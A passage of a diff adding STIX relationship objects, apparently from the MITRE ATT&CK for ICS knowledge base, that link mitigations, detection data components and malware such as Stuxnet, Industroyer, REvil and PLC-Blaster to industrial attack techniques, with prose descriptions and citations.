"2022-05-06T17:47:24.175Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict the modification of programs to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--e09f3308-57d7-4b2b-b340-784b88ae61ca", + "created": "2022-09-27T15:42:39.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:43:48.288Z", + "description": "Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58a0fd57-ea5f-46b0-84ac-c5b963fb7e94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Use multi-factor authentication wherever possible.\n", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--242b5a0d-e4e8-4ceb-a975-cf8efd64e981", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.138Z", + "relationship_type": "mitigates", + "description": "Protection devices should have minimal digital components to prevent exposure to related adversarial techniques. Examples include interlocks, rupture disks, release valves, etc. (Citation: A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004) \n", + "source_ref": "course-of-action--8bc4a54e-810c-4600-8b6c-08fa8413a401", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "external_references": [ + { + "source_name": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004", + "description": "A G Foord, W G Gulland, C R Howard, T Kellacher, W H Smith 2004 APPLYING THE LATEST STANDARD FOR FUNCTIONAL SAFETY IEC 61511 Retrieved. 2020/09/17 ", + "url": "https://www.icheme.org/media/9906/xviii-paper-23.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--058396ca-3af4-444b-b261-74485c47e68c", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:17.124Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--949b498c-ca3f-4704-90bd-a22a4d34067f", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:37:55.042Z", + "description": "Monitor for loss of operational process data which could indicate alarms are being suppressed. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--31897c41-1d47-4a34-b531-21c3f74651a8", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:39.796Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) utilizes the PLC communication and management API to load executable Program Organization Units. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--321fc522-bc6b-4975-bee4-9098624d1e8c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:32:18.815Z", + "description": "Monitor for network traffic originating from unknown/unexpected devices or addresses. Local network traffic metadata could be used to identify unexpected connections, including unknown/unexpected source MAC addresses connecting to ports associated with operational protocols. Also, network management protocols such as DHCP and ARP may be helpful in identifying unexpected devices. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59c65014-1fee-4c2e-9ece-9883159bbed2", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:16:20.286Z", + "description": "Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting. For added context on adversary procedures and background see [Service Stop](https://attack.mitre.org/techniques/T1489).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a4c81fe6-1ad9-4bba-a415-a3c099eaa2be", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:02:30.876Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) stops the execution of the user program on the target to enable the transfer of its own code. The worm then copies itself to the target and subsequently starts the target PLC again. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9b412b1f-2dd0-4e7f-8364-f625181ba1db", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.232Z", + "relationship_type": "mitigates", + "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining access to valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. MFA can also be used to restrict access to cloud resources and APIs.\n", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--15a39e3b-124e-4e68-95b5-7b8020225c12", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:27.289Z", + "description": "Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bde941c6-2ca0-4f94-9336-027e7eee15a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.082Z", + "relationship_type": "mitigates", + "description": "Configure internal and external firewalls to block traffic using common ports that associate to network protocols that may be unnecessary for that particular network segment.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--81add433-49d8-43ec-85d5-f48fe80e56e7", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:44:21.000Z", + "description": "Devices that provide user access to the underlying operating system may allow the installation of custom software to monitor OS API execution. Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ed07095-c23a-4676-807f-a544deaeb274", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee Labs October 2019", + "description": "McAfee Labs 2019, October 02 McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service What The Code Tells Us Retrieved. 2021/04/12 ", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us" + }, + { + "source_name": "SecureWorks September 2019", + "description": "SecureWorks 2019, September 24 REvil/Sodinokibi Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:05:35.788Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) sends exfiltrated data from the victims system using HTTPS POST messages sent to the C2 system. (Citation: McAfee Labs October 2019) (Citation: SecureWorks September 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b7f23af2-e948-4531-af56-1a1b4d03702f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.172Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3478c49c-594b-4224-b7f9-2b0b09c67288", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.239Z", + "relationship_type": "mitigates", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications. (Citation: Bastille April 2017)\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "external_references": [ + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--309e4558-e591-4d03-9bb9-07d30acf011f", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee Labs October 2019", + "description": "McAfee Labs 2019, October 02 McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service What The Code Tells Us Retrieved. 2021/04/12 ", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:04:11.691Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) searches for all processes listed in the prc field within its configuration file and then terminates each process. (Citation: McAfee Labs October 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:12:43.166Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages over serial COM ports are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6681bc38-0b55-4714-b690-c609956b40bf", + "created": "2022-09-28T20:27:33.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.438Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can brute force password-based authentication to Schneider PLCs over the CODESYS protocol (UDP port 1740).(Citation: CISA-AA22-103A)\n\n [INCONTROLLER](https://attack.mitre.org/software/S1045) can perform brute force guessing of passwords to OPC UA servers using a predefined list of passwords.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b48a9fea-26a5-473c-9a5d-fcc3531e1fd3", + "created": "2023-03-30T18:59:30.677Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:59:30.677Z", + "description": "Develop and publish policies that define acceptable information to be stored on local systems.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f130282b-f681-455f-966b-55829842be92", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:00:06.894Z", + "description": "One of [Stuxnet](https://attack.mitre.org/software/S0603)'s rootkits is contained entirely in the fake s7otbxdx.dll. In order to continue existing undetected on the PLC it needs to account for at least the following situations: read requests for its own malicious code blocks, read requests for infected blocks (OB1, OB35, DP_RECV), and write requests that could overwrite Stuxnets own code. Stuxnet contains code to monitor and intercept these types of requests. The rootkit modifies these requests so that Stuxnets PLC code is not discovered or damaged. (Citation: Langer Stuxnet)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--efb80069-e4be-4055-bd34-06d1376b4601", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Access Management technologies can be used to enforce authorization policies and decisions, especially when existing field devices do not provide capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "external_references": [ + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a6d8b66d-fc10-404f-b0ae-e8c66506b818", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T20:13:05.134Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s data wiper component removes the registry image path throughout the system and overwrites all files, rendering the system unusable. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--53af6987-21bb-46fd-bf85-e3eeaa74de1a", + "created": "2023-03-30T14:08:23.251Z", + "revoked": false, + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:23.251Z", + "description": "Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment.(Citation: CISA June 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e767c178-e4b2-490a-b544-bb1b2d6c7de4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Application isolation will limit the other processes and system features an exploited target can access. Examples of built in features are software restriction policies, AppLocker for Windows, and SELinux or AppArmor for Linux.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--33486e89-f0f4-4507-9f13-48a8f22c8ac8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Review vendor documents and security alerts for potentially unknown or overlooked default credentials within existing devices\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": 